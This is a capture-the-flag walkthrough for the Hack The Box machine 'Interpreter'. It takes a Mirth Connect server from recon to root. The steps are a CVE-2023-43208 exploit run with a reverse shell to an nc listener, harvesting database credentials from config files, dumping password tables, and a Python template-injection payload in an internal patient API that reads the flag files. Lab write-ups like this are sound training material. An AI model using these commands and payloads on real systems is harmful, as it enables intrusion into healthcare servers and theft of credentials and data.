🖨️Interpreter

https://app.hackthebox.com/machines/Interpreter

HTB — Interpreter Walkthrough

---

Recon

Nmap

sudo nmap -sCV <machine-ip>

Findings:

• 22/tcp — SSH

• 80/tcp — HTTP (Jetty)

• 443/tcp — HTTPS (Jetty)

Both web ports show Mirth Connect Administrator.

---

Web Enumeration

Browsing the target:

GET / HTTP/1.1
Host: <machine-ip>

Landing page → Mirth Connect Administrator

Important observation:

• Redirect logic references /webadmin/Index.action

• Presence of Java Web Start (webstart.jnlp)

---

Version Identification

GET /api/server/version HTTP/1.1
Host: <machine-ip>
X-Requested-With: OpenAPI

Result:

4.4.0

Version < 4.4.1 → Vulnerable.

---

Initial Access — CVE-2023-43208

Exploit used:

python CVE-2023-43208.py -u https://<machine-ip>/ -lh <vpn-ip> -lp <vpn-port>

Listener:

rlwrap nc -nlvp <vpn-port>

Shell obtained:

whoami
mirth

---

Local Enumeration

Inspect configuration:

cd conf
cat mirth.properties

Credentials recovered:

database.username = mirthdb
database.password = MirthPass123!
database.url = jdbc:mariadb://localhost:3306/mc_bdd_prod

---

Database Access

mysql -u mirthdb -p'MirthPass123!' -h 127.0.0.1 -D mc_bdd_prod

Interesting tables:

• CHANNEL

• PERSON

• PERSON_PASSWORD

Dump passwords:

SELECT * FROM PERSON_PASSWORD;

(No useful cracking results.)

---

Discovering Internal Service (addPatient)

Active listeners:

ss -tulnp

Interesting port:

127.0.0.1:54321

Dump channel configuration:

mysql -u mirthdb -p'MirthPass123!' -h 127.0.0.1 -D mc_bdd_prod -e "SELECT * FROM CHANNEL;"

Inside channel XML:

<host>http://127.0.0.1:54321/addPatient</host>

✅ Internal API endpoint discovered

This is common in Mirth — channels often forward messages to backend services.

---

Interacting With addPatient

Test request from compromised shell:

python3 - << 'EOF'
import urllib.request

xml = b'''<patient>
  <timestamp>20250101120000</timestamp>
  <sender_app>TEST</sender_app>
  <id>12345</id>
  <firstname>John</firstname>
  <lastname>Doe</lastname>
  <birth_date>01/01/1990</birth_date>
  <gender>M</gender>
</patient>'''

req = urllib.request.Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml,
    headers={"Content-Type": "application/xml"}
)

print(urllib.request.urlopen(req).read().decode())
EOF

Valid response → Endpoint confirmed.

---

Vulnerability Analysis

Observed behavior:

• User input reflected in response

• Python-style expression evaluation

Test payload:

<firstname>{__import__("os").popen("id").read()}</firstname>

Response:

uid=0(root)

✅ Code Execution via Template Injection

Backend is evaluating expressions inside {}.

---

Reading Flags

User Flag

python3 - << 'EOF'
import urllib.request

xml = b'''<patient>
  <timestamp>20250101120000</timestamp>
  <sender_app>TEST</sender_app>
  <id>12345</id>
  <firstname>{open("/home/sedric/user.txt").read()}</firstname>
  <lastname>Doe</lastname>
  <birth_date>01/01/1990</birth_date>
  <gender>M</gender>
</patient>'''

req = urllib.request.Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml,
    headers={"Content-Type": "application/xml"}
)

print(urllib.request.urlopen(req).read().decode())
EOF

---

Root Flag

python3 - << 'EOF'
import urllib.request

xml = b'''<patient>
  <timestamp>20250101120000</timestamp>
  <sender_app>TEST</sender_app>
  <id>12345</id>
  <firstname>{open("/root/root.txt").read()}</firstname>
  <lastname>Doe</lastname>
  <birth_date>01/01/1990</birth_date>
  <gender>M</gender>
</patient>'''

req = urllib.request.Request(
    "http://127.0.0.1:54321/addPatient",
    data=xml,
    headers={"Content-Type": "application/xml"}
)

print(urllib.request.urlopen(req).read().decode())
EOF

---

Key Takeaways

✔ RCE in Mirth Connect (CVE-2023-43208) ✔ Sensitive credentials in config files ✔ Channel configs often reveal internal architecture ✔ Template Injection → Full system compromise

---